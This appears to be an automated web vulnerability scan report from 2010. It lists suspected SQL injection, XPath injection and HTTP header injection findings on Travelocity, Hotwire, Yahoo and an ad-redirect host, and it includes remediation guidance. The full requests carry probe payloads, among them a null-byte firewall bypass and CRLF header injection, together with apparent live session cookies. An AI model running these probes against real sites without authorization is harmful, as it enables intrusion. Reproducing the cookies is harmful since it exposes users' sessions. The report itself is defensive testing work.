SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=103754&AdID=141160&TargetID=28779&Values=215&Redirect=http:/ad.redacted.hostname/jump/N553.ae.travelocity/B4838870.9 HTTP/1.1 Host: dm.travelocity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SID=T000V00000X101212094421020188304057814; Service=Travelocity; JSID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; NGUserID=ad0fb13-29368-1289680804-1; __utmz=54245047.1291431118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tyrg1st=4D682B341EE14274; __utma=54245047.882459144.1291431118.1291431118.1291431118.1; cbHistoryPerm=QWlyfEhPVXxTRk98MTIvMjYvMjAxMHwwMS8wMi8yMDExfFVTOg==; mbox=PC#1291431114561-411070.20#1293378239|check#true#1292168697|session#1292168636626-269062#1292170497;
Response 1
HTTP/1.1 500 Server Error Server: Sun-ONE-Web-Server/6.1 Date: Sun, 12 Dec 2010 15:57:43 GMT Content-length: 305 Content-type: text/html Cache-control: no-cache Connection: close
<HTML><HEAD><TITLE>Server Error</TITLE></HEAD> <BODY><H1>Server Error</H1> This server has encountered an internal error which prevents it from fulfilling your request. The most likely cause is a misc ...[SNIP]...
Request 2
GET /event.ng/Type''=click&FlightID=103754&AdID=141160&TargetID=28779&Values=215&Redirect=http:/ad.redacted.hostname/jump/N553.ae.travelocity/B4838870.9 HTTP/1.1 Host: dm.travelocity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SID=T000V00000X101212094421020188304057814; Service=Travelocity; JSID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; NGUserID=ad0fb13-29368-1289680804-1; __utmz=54245047.1291431118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tyrg1st=4D682B341EE14274; __utma=54245047.882459144.1291431118.1291431118.1291431118.1; cbHistoryPerm=QWlyfEhPVXxTRk98MTIvMjYvMjAxMHwwMS8wMi8yMDExfFVTOg==; mbox=PC#1291431114561-411070.20#1293378239|check#true#1292168697|session#1292168636626-269062#1292170497;
Response 2
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Sun, 12 Dec 2010 15:57:43 GMT Cache-control: no-cache Cache-control: no-cache Pragma: max-age=0 Location: http://redacted.host.name/jump/N553.ae.travelocity/B4838870.9 Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=110592&AdID=148582&TargetID=29376&Segments=1,9,449,1024,3017,3336,3799,4301,4302,4327,4634,4719,5180,5563,6968,8989,9612,9990,10495,11148,11925,12670,13671,14438,14655,15011,15299,16146,16595,17055,17759,17979,18014,18029,18030,18185,18186,18197,18203,18204,18205,18206,18226,18268,18269,18309,18375,18385,18434,18435,18602,18603,18604,18631,18720,18816,18846,18998,19026,19028,19060,19268,19321,19326,19383,19468,19516,19565,19661,19663,19679,19726,19745&Targets=5907,13594,20600,8706,28089,27283,29374,29225,28461,29401,9683,16355,25704,16323,28342,26923,24316,27129,27750,28390,28785,29521,16183,29255,29376,29402,27058,27072,27094,28353,28783,17979&Values=25,30,51,60,72,80,90,101,110,150,152,206,215,230,261,1244,2176,2218,2285,2297,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2467,3335,4760,4775,4831,6472,6474,6507,6733,8257,8393,8512,8956,9080,9109,9743,9845,9846,9901,11774,12194,12196&RawValues=&Redirect=http:/leisure.travelocity.com/Promotions/0,,TRAVELOCITY|5826|airfare_main|,00.html HTTP/1.1 Host: dm.travelocity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SID=T000V00000X101212094421020188304057814; Service=Travelocity; JSID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; NGUserID=ad0fb13-29368-1289680804-1; __utmz=54245047.1291431118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tyrg1st=4D682B341EE14274; __utma=54245047.882459144.1291431118.1291431118.1291431118.1; cbHistoryPerm=QWlyfEhPVXxTRk98MTIvMjYvMjAxMHwwMS8wMi8yMDExfFVTOg==; mbox=PC#1291431114561-411070.20#1293378239|check#true#1292168697|session#1292168636626-269062#1292170497;
Response 1
HTTP/1.1 500 Server Error Server: Sun-ONE-Web-Server/6.1 Date: Sun, 12 Dec 2010 15:57:31 GMT Content-length: 305 Content-type: text/html Cache-control: no-cache Connection: close
<HTML><HEAD><TITLE>Server Error</TITLE></HEAD> <BODY><H1>Server Error</H1> This server has encountered an internal error which prevents it from fulfilling your request. The most likely cause is a misc ...[SNIP]...
Request 2
GET /event.ng/Type''=click&FlightID=110592&AdID=148582&TargetID=29376&Segments=1,9,449,1024,3017,3336,3799,4301,4302,4327,4634,4719,5180,5563,6968,8989,9612,9990,10495,11148,11925,12670,13671,14438,14655,15011,15299,16146,16595,17055,17759,17979,18014,18029,18030,18185,18186,18197,18203,18204,18205,18206,18226,18268,18269,18309,18375,18385,18434,18435,18602,18603,18604,18631,18720,18816,18846,18998,19026,19028,19060,19268,19321,19326,19383,19468,19516,19565,19661,19663,19679,19726,19745&Targets=5907,13594,20600,8706,28089,27283,29374,29225,28461,29401,9683,16355,25704,16323,28342,26923,24316,27129,27750,28390,28785,29521,16183,29255,29376,29402,27058,27072,27094,28353,28783,17979&Values=25,30,51,60,72,80,90,101,110,150,152,206,215,230,261,1244,2176,2218,2285,2297,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2467,3335,4760,4775,4831,6472,6474,6507,6733,8257,8393,8512,8956,9080,9109,9743,9845,9846,9901,11774,12194,12196&RawValues=&Redirect=http:/leisure.travelocity.com/Promotions/0,,TRAVELOCITY|5826|airfare_main|,00.html HTTP/1.1 Host: dm.travelocity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SID=T000V00000X101212094421020188304057814; Service=Travelocity; JSID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; NGUserID=ad0fb13-29368-1289680804-1; __utmz=54245047.1291431118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tyrg1st=4D682B341EE14274; __utma=54245047.882459144.1291431118.1291431118.1291431118.1; cbHistoryPerm=QWlyfEhPVXxTRk98MTIvMjYvMjAxMHwwMS8wMi8yMDExfFVTOg==; mbox=PC#1291431114561-411070.20#1293378239|check#true#1292168697|session#1292168636626-269062#1292170497;
Response 2
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Sun, 12 Dec 2010 15:57:32 GMT Cache-control: no-cache Cache-control: no-cache Pragma: max-age=0 Location: http://leisure.travelocity.com/Promotions/0,,TRAVELOCITY|5826|airfare_main|,00.html Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /event.ng/Type'=click&FlightID=110720&AdID=148764&TargetID=29404&Segments=1,9,449,1024,3017,3336,3799,4300,4303,4327,4634,4719,5180,5563,5905,6968,9612,9990,10495,11148,12670,13671,14438,14655,15011,15299,15436,16146,16594,17055,17759,17980,18014,18029,18030,18185,18186,18197,18203,18204,18205,18206,18226,18268,18269,18309,18375,18385,18434,18435,18602,18603,18604,18631,18720,18816,18846,18998,19026,19028,19060,19268,19321,19326,19383,19468,19516,19565,19661,19663,19679,19726,19745&Targets=5907,11483,12181,8427,28407,20599,22942,27282,28088,28462,29226,29373,29398,8852,23240,28340,25289,24319,27130,27753,28391,28864,29438,28321,27097,25728,8956,27422,27937,28310,28354,28125,29404,23166,28780&Values=25,30,51,60,72,80,90,101,110,150,152,194,206,215,230,261,1244,2176,2218,2285,2297,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2467,3335,4760,4775,4831,6472,6474,6507,8257,8393,8512,8956,9080,9109,9743,9845,9846,9901,11774,12194,12196&RawValues=&Redirect=http:/leisure.travelocity.com/Promotions/0,,TRAVELOCITY|6449|cars_main,00.html HTTP/1.1 Host: dm.travelocity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SID=T000V00000X101212094421020188304057814; Service=Travelocity; JSID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; NGUserID=ad0fb13-29368-1289680804-1; __utmz=54245047.1291431118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tyrg1st=4D682B341EE14274; __utma=54245047.882459144.1291431118.1291431118.1291431118.1; cbHistoryPerm=QWlyfEhPVXxTRk98MTIvMjYvMjAxMHwwMS8wMi8yMDExfFVTOg==; mbox=PC#1291431114561-411070.20#1293378239|check#true#1292168697|session#1292168636626-269062#1292170497;
Response 1
HTTP/1.1 500 Server Error Server: Sun-ONE-Web-Server/6.1 Date: Sun, 12 Dec 2010 15:57:47 GMT Content-length: 305 Content-type: text/html Cache-control: no-cache Connection: close
<HTML><HEAD><TITLE>Server Error</TITLE></HEAD> <BODY><H1>Server Error</H1> This server has encountered an internal error which prevents it from fulfilling your request. The most likely cause is a misc ...[SNIP]...
Request 2
GET /event.ng/Type''=click&FlightID=110720&AdID=148764&TargetID=29404&Segments=1,9,449,1024,3017,3336,3799,4300,4303,4327,4634,4719,5180,5563,5905,6968,9612,9990,10495,11148,12670,13671,14438,14655,15011,15299,15436,16146,16594,17055,17759,17980,18014,18029,18030,18185,18186,18197,18203,18204,18205,18206,18226,18268,18269,18309,18375,18385,18434,18435,18602,18603,18604,18631,18720,18816,18846,18998,19026,19028,19060,19268,19321,19326,19383,19468,19516,19565,19661,19663,19679,19726,19745&Targets=5907,11483,12181,8427,28407,20599,22942,27282,28088,28462,29226,29373,29398,8852,23240,28340,25289,24319,27130,27753,28391,28864,29438,28321,27097,25728,8956,27422,27937,28310,28354,28125,29404,23166,28780&Values=25,30,51,60,72,80,90,101,110,150,152,194,206,215,230,261,1244,2176,2218,2285,2297,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2467,3335,4760,4775,4831,6472,6474,6507,8257,8393,8512,8956,9080,9109,9743,9845,9846,9901,11774,12194,12196&RawValues=&Redirect=http:/leisure.travelocity.com/Promotions/0,,TRAVELOCITY|6449|cars_main,00.html HTTP/1.1 Host: dm.travelocity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SID=T000V00000X101212094421020188304057814; Service=Travelocity; JSID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; NGUserID=ad0fb13-29368-1289680804-1; __utmz=54245047.1291431118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tyrg1st=4D682B341EE14274; __utma=54245047.882459144.1291431118.1291431118.1291431118.1; cbHistoryPerm=QWlyfEhPVXxTRk98MTIvMjYvMjAxMHwwMS8wMi8yMDExfFVTOg==; mbox=PC#1291431114561-411070.20#1293378239|check#true#1292168697|session#1292168636626-269062#1292170497;
Response 2
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Sun, 12 Dec 2010 15:57:48 GMT Cache-control: no-cache Cache-control: no-cache Pragma: max-age=0 Location: http://leisure.travelocity.com/Promotions/0,,TRAVELOCITY|6449|cars_main,00.html Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /air/results.jsp' HTTP/1.1 Host: www.hotwire.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gsc=010000000000; JSESSIONID=696893C9FABF034B9EE9510BDA894AE3; ev20=sid%3AS174%2Cbid%3AB265188; quoter_buyer=AQ; s_sq=%5B%5BB%5D%5D; SaneID=fHvyMp3BJs27MvPQS2W2t9lSY5dCQRQ51G6B0fpqhwMhkgDYyN2c; hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi68RxF2Pr/qCeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLV1ZNZZS2s1N/CXl/JDRrtXRXkbu5w3HPUE/Z5usfy4aGkWk9/jjnclZsu+uQHpMAdpmB6SWs5cD9+3oqUwxdMfV06Gm5M+BeEKcPpXIKw/UwTtNmMtrEQ2+LeyEMY8og4FxT6sdXvYjSZ4Zfgpr/fI+rfTHDFUOWuz/O8F4vY2BGgRZLaNi3EtoIM4XG3Qn+B1w2tSEKlFnShoLKeUH+z+Y2+E+iE3AyLLgcGLVoWjOzcezxsXydDOB6tIjFw5WDk4ULezfvyVXgFjecb81pt1fe9k6loXfwc3lSCDpwQZbNDmpTSBpfMj3pRx4CpBqVR01RcQP9Mg9LwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx7wvWHjlWcoDegtEBzEpTitu89D7RJc9fva4TDrBZ6IAVcsFUp4C9lz8Jbl1Jg6E2l0jXVk076XqX6JDXjlNKVOdBLWSH8NNI/7e89k10O8suZIu8cBOHG0r6I9hNg4pdHfoj2E2Dil0dycEw0tHIOLr6I9hNg4pdHSuO1on7pnLQ2QAQqWQXGpH6I9hNg4pdHfoj2E2Dil0dtBuopR7pIozm8aOIRho2+voj2E2Dil0dCg5lZqxghjXqopy7X+MXZzzhEsuwUnZahIaUhoyAr4H6I9hNg4pdHcAjFx3P14/aaJ0QJw9Qs2UknHXxi6KgoUXco5H15qjnJpdHOV+pPBgteouGgHRKuuD22m12apPBP+b3d8Ua/laDoKxlGdEyToRcgOMhUL7ANKks0QXfM4qvqKuYD2wfdef3HNLHSQ1IZ5+NI4QMM5zSieEL01cBCZFWyOz9SP6X; NSC_qspe-xxx-qfstjtu=ffffffffaf131c3045525d5f4f58455e445a4a422d69; s_cc=true; hwAnalytics=previousPageName=air.results&crossPageVariables=%7B%22eVar34%22%3A%22FLU01-01%2CAPD01-01%2CMED01-03%2CLCP01-01%22%7D; s_vi=[CS]v1|266F7BDE8514A831-4000014F001703F1[CE]; s_nr=1289702421780; s_cpm=%5B%5B%27sid%3AS174%2Cbid%3AB265179%27%2C%271289702410218%27%5D%2C%5B%27sid%3AS174%2Cbid%3AB265188%27%2C%271292168643960%27%5D%5D; auth=true; hotwirePageModuleState=pgoodCode=A&searchTokenId=1;
Response 1
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Cache-control: no-store, no-cache, private, must-revalidate Content-Type: text/html;charset=UTF-8 Date: Sun, 12 Dec 2010 15:52:22 GMT Content-Length: 25686
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
The SaneID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SaneID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /car/index.jsp HTTP/1.1 Host: www.hotwire.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gsc=010000000000; JSESSIONID=696893C9FABF034B9EE9510BDA894AE3; ev20=sid%3AS174%2Cbid%3AB265188; quoter_buyer=AQ; s_sq=%5B%5BB%5D%5D; SaneID=fHvyMp3BJs27MvPQS2W2t9lSY5dCQRQ51G6B0fpqhwMhkgDYyN2c%00'; hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi68RxF2Pr/qCeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLV1ZNZZS2s1N/CXl/JDRrtXRXkbu5w3HPUE/Z5usfy4aGkWk9/jjnclZsu+uQHpMAdpmB6SWs5cD9+3oqUwxdMfV06Gm5M+BeEKcPpXIKw/UwTtNmMtrEQ2+LeyEMY8og4FxT6sdXvYjSZ4Zfgpr/fI+rfTHDFUOWuz/O8F4vY2BGgRZLaNi3EtoIM4XG3Qn+B1w2tSEKlFnShoLKeUH+z+Y2+E+iE3AyLLgcGLVoWjOzcezxsXydDOB6tIjFw5WDk4ULezfvyVXgFjecb81pt1fe9k6loXfwc3lSCDpwQZbNDmpTSBpfMj3pRx4CpBqVR01RcQP9Mg9LwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx7wvWHjlWcoDegtEBzEpTitu89D7RJc9fva4TDrBZ6IAVcsFUp4C9lz8Jbl1Jg6E2l0jXVk076XqX6JDXjlNKVOdBLWSH8NNI/7e89k10O8suZIu8cBOHG0r6I9hNg4pdHfoj2E2Dil0dycEw0tHIOLr6I9hNg4pdHSuO1on7pnLQ2QAQqWQXGpH6I9hNg4pdHfoj2E2Dil0dtBuopR7pIozm8aOIRho2+voj2E2Dil0dCg5lZqxghjXqopy7X+MXZzzhEsuwUnZahIaUhoyAr4H6I9hNg4pdHcAjFx3P14/aaJ0QJw9Qs2UknHXxi6KgoUXco5H15qjnJpdHOV+pPBgteouGgHRKuuD22m12apPBP+b3d8Ua/laDoKxlGdEyToRcgOMhUL7ANKks0QXfM4qvqKuYD2wfdef3HNLHSQ1IZ5+NI4QMM5zSieEL01cBCZFWyOz9SP6X; NSC_qspe-xxx-qfstjtu=ffffffffaf131c3045525d5f4f58455e445a4a422d69; s_cc=true; hwAnalytics=previousPageName=air.results&crossPageVariables=%7B%22eVar34%22%3A%22FLU01-01%2CAPD01-01%2CMED01-03%2CLCP01-01%22%7D; s_vi=[CS]v1|266F7BDE8514A831-4000014F001703F1[CE]; s_nr=1289702421780; s_cpm=%5B%5B%27sid%3AS174%2Cbid%3AB265179%27%2C%271289702410218%27%5D%2C%5B%27sid%3AS174%2Cbid%3AB265188%27%2C%271292168643960%27%5D%5D; auth=true; hotwirePageModuleState=pgoodCode=A&searchTokenId=1;
Response 1
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Cache-control: no-store, no-cache, private, must-revalidate Content-Type: text/html;charset=UTF-8 Date: Sun, 12 Dec 2010 15:52:14 GMT Content-Length: 104666
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
The hotwireLogin cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hotwireLogin cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /hotel/search-options.jsp HTTP/1.1 Host: www.hotwire.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gsc=010000000000; JSESSIONID=696893C9FABF034B9EE9510BDA894AE3; ev20=sid%3AS174%2Cbid%3AB265188; quoter_buyer=AQ; s_sq=%5B%5BB%5D%5D; SaneID=fHvyMp3BJs27MvPQS2W2t9lSY5dCQRQ51G6B0fpqhwMhkgDYyN2c; hotwireLogin=V4XFi9mFuQsCCPy6V/qhrdIccYJFHrJxloNL+OGc4tZkfjnIHGhTi68RxF2Pr/qCeO+uyJQdNdBMLRhhG2FHTMgXg79d4ve0wj4co6fHPBw/6XrC+I2V0VAJjgDrxtP6UCZQAzRZKNmqg6s3BNNiMzoqSlE+9QLV1ZNZZS2s1N/CXl/JDRrtXRXkbu5w3HPUE/Z5usfy4aGkWk9/jjnclZsu+uQHpMAdpmB6SWs5cD9+3oqUwxdMfV06Gm5M+BeEKcPpXIKw/UwTtNmMtrEQ2+LeyEMY8og4FxT6sdXvYjSZ4Zfgpr/fI+rfTHDFUOWuz/O8F4vY2BGgRZLaNi3EtoIM4XG3Qn+B1w2tSEKlFnShoLKeUH+z+Y2+E+iE3AyLLgcGLVoWjOzcezxsXydDOB6tIjFw5WDk4ULezfvyVXgFjecb81pt1fe9k6loXfwc3lSCDpwQZbNDmpTSBpfMj3pRx4CpBqVR01RcQP9Mg9LwtRpnviW5iB6TzG4qM3vCGJzuO/q61vTeJmSjVVzx7wvWHjlWcoDegtEBzEpTitu89D7RJc9fva4TDrBZ6IAVcsFUp4C9lz8Jbl1Jg6E2l0jXVk076XqX6JDXjlNKVOdBLWSH8NNI/7e89k10O8suZIu8cBOHG0r6I9hNg4pdHfoj2E2Dil0dycEw0tHIOLr6I9hNg4pdHSuO1on7pnLQ2QAQqWQXGpH6I9hNg4pdHfoj2E2Dil0dtBuopR7pIozm8aOIRho2+voj2E2Dil0dCg5lZqxghjXqopy7X+MXZzzhEsuwUnZahIaUhoyAr4H6I9hNg4pdHcAjFx3P14/aaJ0QJw9Qs2UknHXxi6KgoUXco5H15qjnJpdHOV+pPBgteouGgHRKuuD22m12apPBP+b3d8Ua/laDoKxlGdEyToRcgOMhUL7ANKks0QXfM4qvqKuYD2wfdef3HNLHSQ1IZ5+NI4QMM5zSieEL01cBCZFWyOz9SP6X'; NSC_qspe-xxx-qfstjtu=ffffffffaf131c3045525d5f4f58455e445a4a422d69; s_cc=true; hwAnalytics=previousPageName=air.results&crossPageVariables=%7B%22eVar34%22%3A%22FLU01-01%2CAPD01-01%2CMED01-03%2CLCP01-01%22%7D; s_vi=[CS]v1|266F7BDE8514A831-4000014F001703F1[CE]; s_nr=1289702421780; s_cpm=%5B%5B%27sid%3AS174%2Cbid%3AB265179%27%2C%271289702410218%27%5D%2C%5B%27sid%3AS174%2Cbid%3AB265188%27%2C%271292168643960%27%5D%5D; auth=true; hotwirePageModuleState=pgoodCode=A&searchTokenId=1;
Response 1
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Cache-control: no-store, no-cache, private, must-revalidate Content-Type: text/html;charset=ISO-8859-1 Date: Sun, 12 Dec 2010 15:52:15 GMT Content-Length: 49798
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Issue background
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
Request
GET /yui%00'/license.html HTTP/1.1 Host: developer.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 15:57:34 GMT Set-Cookie: B=608mk6t6g9s7e&b=3&s=lm; expires=Tue, 12-Dec-2012 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private Content-Length: 29806
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="descr ...[SNIP]... <a href="http://yuilibrary.com/forum/viewtopic.php?p=20001#p20001">DataTable and DataSource :: Not able to fetch all values using useXPath</a> ...[SNIP]...
3. HTTP header injectionpreviousnext There are 13 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
3.1. http://533.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://533.xg4ken.com
Path:
/media/redir.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload c203c%0d%0ab84cdc07ffc was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=2&camp=490&affcode=kw403722&cid=5691665607&networkType=search&url[]=http%3A%2F%2Fwww.groupon.com%2Fsan-francisco%2Fsubscribe%3Futm_source%3DGoogle%26utm_medium%3Dcpc%26utm_campaign%3DSearch%26utm_term%3Dsan%20francisco%20cheap%20deals%26d%3DCalifornia_-_San_Francisco%26g%3DTest_-_expanded_-_Deals_-_City%26m%3Db%26k_clickID%3D_kenshoo_clickid_&c203c%0d%0ab84cdc07ffc=1 HTTP/1.1 Host: 533.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 12 Dec 2010 15:54:43 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=7d0a4400-0558-13e8-1316-00001ad51923; expires=Sat, 12-Mar-2011 15:54:43 GMT; path=/; domain=.xg4ken.com Location: http://www.groupon.com/san-francisco/subscribe?utm_source=Google&utm_medium=cpc&utm_campaign=Search&utm_term=san francisco cheap deals&d=California_-_San_Francisco&g=Test_-_expanded_-_Deals_-_City&m=b&k_clickID=7d0a4400-0558-13e8-1316-00001ad51923&c203c b84cdc07ffc=1 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
